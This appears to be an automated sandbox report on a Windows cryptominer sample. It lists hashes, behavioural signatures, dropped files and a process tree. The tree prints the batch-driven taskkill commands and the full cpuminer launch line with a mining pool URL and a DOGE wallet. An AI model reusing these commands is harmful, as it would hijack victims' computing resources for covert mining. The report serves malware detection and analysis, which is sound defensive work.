ea3d4332c1e8900fcbe8a41f5a28cbce9c42130ce8edd6e249b98561ba996331

Analysis

max time kernel
63s
max time network
66s
platform
windows11-21h2_x64
resource
win11-20231222-en
resource tags

arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system
submitted
03/02/2024, 07:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a.exe
Size

8.6MB
MD5

5f1009f9902a7ed2a9a3d5bf73c7e842
SHA1

2d5afd88246324cd974aba59ee99a625da643180
SHA256

ea3d4332c1e8900fcbe8a41f5a28cbce9c42130ce8edd6e249b98561ba996331
SHA512

62634ed61df0027046c16d779c73b9c41894afb39e9b9d7c97413b5c38ceb149dd9acb673f65793c5fb876b34bdcc99193f866f70eb224d1b65c111fe045021a
SSDEEP

196608:k1QQR67H5V7Gtn1mN6A0XudLoxCG1ZmJBZx5o2Bb3ngLnMo6rJ:kqeUsM6A0Xu1ox11ZwBZ/Nh3ngQoYJ

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
4116	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4116	cpuminer-sse2.exe
4116	cpuminer-sse2.exe
4116	cpuminer-sse2.exe
4116	cpuminer-sse2.exe
4116	cpuminer-sse2.exe

Kills process with taskkill 7 IoCs

evasion

pid	Process
832	taskkill.exe
4968	taskkill.exe
1920	taskkill.exe
780	taskkill.exe
2028	taskkill.exe
2720	taskkill.exe
4780	taskkill.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	2720	taskkill.exe
Token: SeDebugPrivilege	4780	taskkill.exe
Token: SeDebugPrivilege	832	taskkill.exe
Token: SeDebugPrivilege	4968	taskkill.exe
Token: SeDebugPrivilege	1920	taskkill.exe
Token: SeDebugPrivilege	780	taskkill.exe
Token: SeDebugPrivilege	2028	taskkill.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1512 wrote to memory of 4676	1512	a.exe	80
PID 1512 wrote to memory of 4676	1512	a.exe	80
PID 4676 wrote to memory of 2720	4676	cmd.exe	81
PID 4676 wrote to memory of 2720	4676	cmd.exe	81
PID 4676 wrote to memory of 4780	4676	cmd.exe	83
PID 4676 wrote to memory of 4780	4676	cmd.exe	83
PID 4676 wrote to memory of 832	4676	cmd.exe	84
PID 4676 wrote to memory of 832	4676	cmd.exe	84
PID 4676 wrote to memory of 4968	4676	cmd.exe	85
PID 4676 wrote to memory of 4968	4676	cmd.exe	85
PID 4676 wrote to memory of 1920	4676	cmd.exe	86
PID 4676 wrote to memory of 1920	4676	cmd.exe	86
PID 4676 wrote to memory of 780	4676	cmd.exe	87
PID 4676 wrote to memory of 780	4676	cmd.exe	87
PID 4676 wrote to memory of 2028	4676	cmd.exe	88
PID 4676 wrote to memory of 2028	4676	cmd.exe	88
PID 4676 wrote to memory of 2540	4676	cmd.exe	89
PID 4676 wrote to memory of 2540	4676	cmd.exe	89
PID 4676 wrote to memory of 4116	4676	cmd.exe	90
PID 4676 wrote to memory of 4116	4676	cmd.exe	90

C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1512
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4C4B.tmp\4C4C.tmp\4C4D.bat C:\Users\Admin\AppData\Local\Temp\a.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4676
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im python.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2720
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im python.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4780
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im python.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:832
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im os-setup-service.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4968
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im tvnserver.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1920
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im tvnserver.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:780
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im ffmpeg.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2028
- - C:\Windows\system32\gpupdate.exe
    gpupdate /force
    3⤵
    PID:2540
- - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
    cpuminer-sse2 -a yespower -o stratum+tcp://yespower.eu.mine.zpool.ca:6234 --userpass=D9toHxZJFG1gttnZVeuNADd7Gvv7fHyqkk:c=DOGE --threads=4
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4116

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\4C4B.tmp\4C4C.tmp\4C4D.bat

Filesize
554B

MD5
31815ed8416dc09aa1a78c4d398b6f1d

SHA1
689744a2624c8c925b6c5c454f3ebfaa2b148675

SHA256
e840766960b40d6848e78eadcdd99616060151da360db8361f8c0c22c8cd9d6d

SHA512
f245be02a85759724bd8ec6862c7af36bab88f15e768146d9399659cfc890fb0afaf3edb088011fa2b379f6f0d964461b42ce55f7d7575a485844e3548aa43d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.5MB

MD5
4457530b024dc73939359e46c4c670a9

SHA1
90c3a40e3578a52ba3e80e323540c60cd5fc64c3

SHA256
e9c7d9ee4def253b18825207d8cb5c618f72da43af80bf9d4cdacea9337e4366

SHA512
d78ce7f0ceb4617df927ae46e826a3374b56d8bdc691388e8096fec4874da067720dba8ec2adadd445222a0cd331b1c34f8a03df564139f2436262ec7191cad2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.7MB

MD5
de2dc013c718cc5b43aea89fb0102441

SHA1
b2c929bfee357180b3b64d50ec03d6db3d2b4682

SHA256
6aa7cc654877d72c49248adc957cda4c29cb8d8572f515b35fc887ae54aa7cab

SHA512
65aefec38fd4d2a821c37178f7523cd36e0d216c6971ae94751d7af349b5d3ae976c82c5785cf285dfb2e36e121ef95bb0e033718b3047be1156299063a27947

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.2MB

MD5
7cf672bee2afba2dcd0c031ff985958e

SHA1
6b82a205db080ffdcb4a4470fce85a14413f3217

SHA256
c82f84171b9246d1cac261100b2199789c96c37b03b375f33b2c72afab060b05

SHA512
3e90d1c1efe0200cb3cc7b51d04783a3cce8391faa6ce554cff8b23dac60be9f8e4f980a8ac005fd9dff8ea4bdcb02311f7649c5be28eb32dcc26417fc4090e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
4.0MB

MD5
92692a330dcf4a3841d976adbcdaad3b

SHA1
0951674a170a7f19832cef67dec0155d6c333c27

SHA256
c8e5c7a03a3fd785a49d52ff2e8c30678cb2443aca10a61e06a36ec7e6c46e4e

SHA512
7383d0fdd46758806bd34a0b57569483624d98afe83e4d3e2331206f483d54a18864db33aa63f94c693a691be243cc805cf544bce8377efa3022196e2d197f6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
9.6MB

MD5
599e36758beb3840cbc4d524cfc9cf4d

SHA1
a729e4ca6314955cf30ccdf39c78e9048a9b9c7f

SHA256
49cdbab9a0a287ad499fcfa3b104b362a02d611119ad50ffbdb1135e0166eec2

SHA512
9ae5c0161cffb8aa274a0d97e83aa1cea2e0c8c8b99a928ef76378dd1bbfd5100b69d0eed134d90245c1c477b52373cef7f6ce807bf59759f2a4e53b630a8141

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
5.1MB

MD5
66696996d63af8725a5f0b552add6508

SHA1
0289d5b5c73f82d7f38b3076544e6141befe3095

SHA256
8962c873ee05174a7959227098d79dfea94b0256e8b458dc5d6eef1ab705a9e4

SHA512
34bd2189a8f858c3f435e977162780d1d39d6428c9847e50b6a29001d5d9bcdec5b1e684770ff3903c6e3a38571af0bec539ff6826649922bf76e8069c38682b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/4116-24-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4116-25-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4116-26-0x00000000567B0000-0x0000000056848000-memory.dmp

Filesize
608KB

Download
memory/4116-27-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4116-28-0x0000000000E60000-0x0000000002715000-memory.dmp

Filesize
24.7MB

Download
memory/4116-29-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4116-34-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4116-39-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4116-44-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download